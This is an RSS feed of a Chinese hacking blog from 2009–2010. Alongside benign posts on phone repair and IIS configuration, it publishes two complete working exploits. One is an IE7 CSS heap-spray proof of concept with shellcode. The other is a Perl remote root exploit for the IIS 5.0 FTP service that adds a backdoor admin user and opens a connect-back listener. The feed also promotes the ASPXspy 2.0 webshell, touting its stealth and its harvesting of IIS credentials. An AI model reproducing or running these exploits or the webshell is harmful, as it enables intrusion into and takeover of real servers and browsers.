<![CDATA[Bin-Blog]]> http://www.rootkit.net.cn/ zh-cn PBlog2 v2.4 Bin-Blog http://www.rootkit.net.cn/images/logos.gif http://www.rootkit.net.cn/ Bin-Blog http://www.rootkit.net.cn/default.asp?id=142 <![CDATA[我的服务器]]> master@rootkit.net.cn(Bin) Wed,13 Jan 2010 01:17:13 +0800 http://www.rootkit.net.cn/default.asp?id=142
我的服务器上还有一个朋友的私服网站。看看里面有多少SHELL。去年10月之前我删除过一批


最近服务器一直被CC,不知道哪位闲的蛋疼的哥们,我看你到底能疼多久。

]]> http://www.rootkit.net.cn/default.asp?id=141 <![CDATA[诺基亚N93摄像头黑屏的救星]]> master@rootkit.net.cn(Bin) Mon,28 Dec 2009 00:05:15 +0800 http://www.rootkit.net.cn/default.asp?id=141
引用内容 引用内容

我的小I在拍照的时候出现了很多条红白条纹,如果出现以下这个情况,有2种解决方案:

1.在照相和摄像来回的切换,稍微切换个4次至5次,我最多一次好像切换了10次左右 果然好了 .所以如果有的朋友和我的一样 不妨也试试能不能修好~!

2.就是小I在旋转屏幕照相的时候将屏幕旋转到底,然后看看你的屏幕,是不是黑屏就不存在了?

虽然他的是N93I,但是按照方法1测试成功,膜拜!

这位大哥如果要是搞安全的,估计能挖出来N多0day!]]> http://www.rootkit.net.cn/default.asp?id=139 <![CDATA[Sa-Upfile 1.0(sa权限上传文件)]]> master@rootkit.net.cn(Bin) Thu,10 Dec 2009 15:48:58 +0800 http://www.rootkit.net.cn/default.asp?id=139
  原理 :利用textcopy进行二进制导入导出。

  文件下载 :

  下载文件 SA-Upfile

   下载文件 SA-Upfile (Google)
]]> http://www.rootkit.net.cn/default.asp?id=138 <![CDATA[南京铱迅发现微软IE7.0 异常CSS导致内存破坏漏洞]]> master@rootkit.net.cn(Bin) Sun,22 Nov 2009 21:12:46 +0800 http://www.rootkit.net.cn/default.asp?id=138 在XHTML 1.0标准下,使用特殊构造的CSS样式,在Internet Explorer 7.0 打开特定的网页后,Internet Explorer 7.0将发生内存崩溃,EIP指针将访问0x70613e5b附近的内存区域。如果将0x70613e5b附近覆盖特殊的机器码,就可以执行任意命令。

2.漏洞危害(危害等级高)
黑客如果将含有“漏洞利用程序的网页”置于网站上,浏览过含有“漏洞利用程序的网页”的客户端将被运行特洛伊木马。

3.通知途径
已经向“国家漏洞库”提交。

4.下载文件 详细文档下载
POC:

更多安全漏洞公布,请关注www.yxlink.com 铱迅安全论坛:bbs.yxlink.com


<!--
请将以下内容粘贴到html文件中,利用成功后,会启动windows计算器程序
南京铱迅信息技术有限公司(Nanjing Yxlink Information Technologies Co.,Ltd.)
http://www.yxlink.com
-->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<HTML xmlns="http://www.w3.org/1999/xhtml">
    <HEAD>
<script>  
            function load(){
                var e;
                e=document.getElementsByTagName("STYLE")[0];
                e.outerHTML="1";
            }
        </script>    
        <STYLE type="text/css">
            body{ overflow: scroll; margin: 0; }
        </style>
      
        <SCRIPT language="javascript">
var shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (x=0; x<4000; x++) memory[x] = block + shellcode;
</script>

    </HEAD>  
    <BODY onload="load()">
    </BODY>
</HTML>
//yxlink.com
]]> http://www.rootkit.net.cn/default.asp?id=137 <![CDATA[WIN2008安装SQL2005出现的"IIS 功能要求"警告解决方案]]> master@rootkit.net.cn(Bin) Mon,09 Nov 2009 20:05:28 +0800 http://www.rootkit.net.cn/default.asp?id=137 http://support.microsoft.com/kb/920201/zh-cn/]]> http://www.rootkit.net.cn/default.asp?id=136 <![CDATA[WIN2008+IIS7 配置 ASP.NET 1.1 环境]]> master@rootkit.net.cn(Bin) Mon,02 Nov 2009 17:14:52 +0800 http://www.rootkit.net.cn/default.asp?id=136
  先贴出来几个:
http://learn.iis.net/page.aspx/472/how-to-install-aspnet-11-with-iis7-on-vista-and-windows-2008/

http://hi.baidu.com/zhujue2009/blog/item/ecc2d2108ff2b5c4c3fd7889.html

http://www.cnblogs.com/nacarat/archive/2008/03/03/1088986.html

以下为我测试的:WIN2008标准版(正版)+IIS7

打开 服务器管理--角色--添加角色--web服务器(IIS)--勾选ASP.NET和ASP(根据实际情况自行选择)



接下来安装 ASP.NET1.1 以及补丁,挨着来吧!

1).NET Framework 1.1 版可再发行组件包
http://www.microsoft.com/downloads/details.aspx?displaylang=zh-cn&FamilyID=262d25e3-f589-4842-8157-034d1e7cf3a3

2).NET Framework 1.1 版Service Pack 1 (.NET1.1累积修补程序)
http://www.microsoft.com/downloads/details.aspx?displaylang=zh-cn&FamilyID=a8f5654f-088e-40b2-bbdb-a83353618b38

3)ASP.NET Security Update for .NET Framework 1.1 SP1 (.NET1.1安全累积更新)
http://www.microsoft.com/downloads/details.aspx?displaylang=zh-cn&FamilyID=8ec6fb8a-29eb-49cf-9dbc-1a0dc2273ff9

开始配置IIS了,打开服务器管理,角色,Internet信息服务器管理器,开打ISAP和CGI限制,设置ASP.NET1.1为允许。



下面我们要新建一个账号,并把它加入到IIS_IUSRS组,为创建程序池,IIS身份验证做准备。



开打 应用程序池,这里我新建了一个,.NET版本选择1.1



右键点击新建的程序池,选择高级设置



下面修改标识为我们刚才新建的那个账号,修改内置账号为自定义账号



现在开始新建网站了,应用程序池选择刚才我们新建的,其他的自己定义,这里说明下"连接为",我们选择应用程序用户(通过身份验证)。



然后点击测试连接,如果失败会有相应的提示,否则就是成功。



点击 站点,打开 身份验证,右键选择编辑,选择应用程序池标识。



右键点击 站点  编辑权限,安全选项卡,其实就是配置WEB目录的访问权限,防止跨目录访问。



折腾完了,看看能否运行,ASP.NET版本为1.1,一切顺利!



总结下:
1.安装ASP.NET1.1后会添加IIS_WPG组,把新建的账号添加到这个组也是可以的。
2.至于其他的帖子说 需要 开启 IIS6数据库兼容性,我这里并没开启,也许环境有差异。

IUSR 内建账号,IIS_IUSRS 内建组
IUSR内建帐号替代了IUSR_MachineName帐号
IIS_IUSRS内建组替代了IIS_WPG组
因为IUSR是一个内建帐号,它不再需要密码。逻辑上你可以认为它就是NETWORKSERVICE或LOCALSERVICE帐号。
IIS_IUSRS组是用来替代IIS_WPG组的,它已经拥有了所有的文件和系统资源的访问权限,因此如果一个帐号被添加到该组中,它将以应用程序池身份无缝工作。
]]> http://www.rootkit.net.cn/default.asp?id=135 <![CDATA[IIS 5.0 FTPd / Remote r00t exploit]]> master@rootkit.net.cn(Bin) Tue,01 Sep 2009 09:34:26 +0800 http://www.rootkit.net.cn/default.asp?id=135
程序代码 程序代码

# IIS 5.0 FTPd / Remote r00t exploit
# Win2k SP4 targets
# bug found & exploited by Kingcope, kcope2<at>googlemail.com
# Affects IIS6 with stack cookie protection
# August 2009 - KEEP THIS 0DAY PRIV8
use IO::Socket;
$|=1;
#metasploit shellcode, adduser "winown:nwoniw"
$sc = "\x89\xe2\xda\xde\xd9\x72\xf4\x5b\x53\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
"\x42\x75\x4a\x49\x4b\x4c\x4a\x48\x50\x44\x43\x30\x43\x30" .
"\x43\x30\x4c\x4b\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x45\x55" .
"\x42\x58\x45\x51\x4a\x4f\x4c\x4b\x50\x4f\x45\x48\x4c\x4b" .
"\x51\x4f\x51\x30\x43\x31\x4a\x4b\x47\x39\x4c\x4b\x47\x44" .
"\x4c\x4b\x43\x31\x4a\x4e\x50\x31\x49\x50\x4c\x59\x4e\x4c" .
"\x4c\x44\x49\x50\x44\x34\x43\x37\x49\x51\x49\x5a\x44\x4d" .
"\x43\x31\x49\x52\x4a\x4b\x4c\x34\x47\x4b\x51\x44\x46\x44" .
"\x43\x34\x43\x45\x4a\x45\x4c\x4b\x51\x4f\x51\x34\x43\x31" .
"\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4f" .
"\x45\x4c\x45\x51\x4a\x4b\x4c\x4b\x45\x4c\x4c\x4b\x45\x51" .
"\x4a\x4b\x4b\x39\x51\x4c\x46\x44\x44\x44\x48\x43\x51\x4f" .
"\x46\x51\x4c\x36\x43\x50\x50\x56\x45\x34\x4c\x4b\x50\x46" .
"\x50\x30\x4c\x4b\x47\x30\x44\x4c\x4c\x4b\x42\x50\x45\x4c" .
"\x4e\x4d\x4c\x4b\x42\x48\x45\x58\x4d\x59\x4a\x58\x4c\x43" .
"\x49\x50\x43\x5a\x46\x30\x43\x58\x4c\x30\x4c\x4a\x44\x44" .
"\x51\x4f\x43\x58\x4a\x38\x4b\x4e\x4d\x5a\x44\x4e\x50\x57" .
"\x4b\x4f\x4a\x47\x42\x43\x42\x4d\x45\x34\x46\x4e\x42\x45" .
"\x44\x38\x43\x55\x47\x50\x46\x4f\x45\x33\x47\x50\x42\x4e" .
"\x42\x45\x43\x44\x51\x30\x44\x35\x44\x33\x45\x35\x44\x32" .
"\x51\x30\x43\x47\x43\x59\x42\x4e\x42\x4f\x43\x47\x42\x4e" .
"\x51\x30\x42\x4e\x44\x37\x42\x4f\x42\x4e\x45\x39\x43\x47" .
"\x47\x50\x46\x4f\x51\x51\x50\x44\x47\x34\x51\x30\x46\x46" .
"\x51\x36\x51\x30\x42\x4e\x42\x45\x44\x34\x51\x30\x42\x4c" .
"\x42\x4f\x43\x53\x45\x31\x42\x4c\x42\x47\x43\x42\x42\x4f" .
"\x43\x45\x42\x50\x47\x50\x47\x31\x42\x44\x42\x4d\x45\x39" .
"\x42\x4e\x42\x49\x42\x53\x43\x44\x43\x42\x45\x31\x44\x34" .
"\x42\x4f\x43\x42\x43\x43\x47\x50\x42\x57\x45\x39\x42\x4e" .
"\x42\x4f\x42\x57\x42\x4e\x47\x50\x46\x4f\x47\x31\x51\x54" .
"\x51\x54\x43\x30\x41\x41";
#1ca
print "IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2\n";
if ($#ARGV ne 1) {
print "usage: iiz5.pl <target> <your local ip>\n";
exit(0);
}
srand(time());
$port = int(rand(31337-1022)) + 1025;
$locip = $ARGV[1];
$locip =~ s/\./,/gi;
if (fork()) {
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                              PeerPort => '21',
                              Proto    => 'tcp');
$patch = "\x7E\xF1\xFA\x7F";
#$retaddr = "ZZZZ";
$retaddr = "\x9B\xB1\xF4\x77"; # JMP ESP univ on 2 win2k platforms
$v = "KSEXY" . $sc . "V" x (500-length($sc)-5);
# top address of stack frame where shellcode resides, is hardcoded inside this block
$findsc="\xB8\x55\x55\x52\x55\x35\x55\x55\x55\x55\x40\x81\x38\x53"
   ."\x45\x58\x59\x75\xF7\x40\x40\x40\x40\xFF\xFF\xE0";
# attack buffer
$c = $findsc . "C" . ($patch x (76/4)) . $patch.$patch.
   ($patch x (52/4)) .$patch."EEEE$retaddr".$patch.
   "HHHHIIII".
$patch."JKKK"."\xE9\x63\xFE\xFF\xFF\xFF\xFF"."NNNN";
$x = <$sock>;
print $x;                            
print $sock "USER anonymous\r\n";
$x = <$sock>;
print $x;
print $sock "PASS anonymous\r\n";
$x = <$sock>;
print $x;
print $sock "MKD w00t$port\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n"; # We store shellcode in memory of process (stack)
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "CWD w00t$port\r\n";
$x = <$sock>;
print $x;
print $sock "MKD CCC". "$c\r\n";
$x = <$sock>;
print $x;
print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "\r\n";
$x = <$sock>;
print $x;
# TRIGGER
print $sock "NLST $c*/../C*/\r\n";
$x = <$sock>;
print $x;
while (1) {}
} else {
my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => 'tcp', Listen => 1);
die "Could not create socket: $!\n" unless $servsock;
my $new_sock = $servsock->accept();
while(<$new_sock>) {
print $_;
}
close($servsock);
}

]]> http://www.rootkit.net.cn/default.asp?id=134 <![CDATA[msn9 for windows2003]]> master@rootkit.net.cn(Bin) Wed,29 Jul 2009 13:53:28 +0800 http://www.rootkit.net.cn/default.asp?id=134   http://pank.org/im/
  http://mess.be/
  http://apatch.org/downloads.php
  清理MSN工具 http://pank.org/ftp/im/uninstwl.exe]]> http://www.rootkit.net.cn/default.asp?id=133 <![CDATA[清理友情链接]]> master@rootkit.net.cn(Bin) Mon,20 Jul 2009 10:54:10 +0800 http://www.rootkit.net.cn/default.asp?id=133 http://www.rootkit.net.cn/default.asp?id=132 <![CDATA[ASPXspy 2.0 ]]> master@rootkit.net.cn(Bin) Tue,14 Jul 2009 23:46:23 +0800 http://www.rootkit.net.cn/default.asp?id=132 2.密码为32位MD5加密(小写) 默认为 admin.
3.全部采用POST方式提交数据,增强了隐蔽性。
4.增强了IIS探测功能,遍历IIS站点信息,绝对路径,多域名绑定,以及IIS账号密码。
5.增加了对指定文件的搜索功能。
6.修正了一些数据库操作的BUG。
7.增强了对注册表的读取,此部分由BloodSword完成,在此感谢。
8.修正了对端口的多线程扫描
9.增强了端口转发功能,参考了Cnqing的一些代码,在此感谢。

免责声明:此工具为安全检测工具,任何人使用此工具,做违法国家法律的事情,责任自负!
联系方式:E-mail:master@rootkit.net.cn Blog:www.rootkit.net.cn

http://code.google.com/p/aspxspy

下载文件 ASPXspy2]]>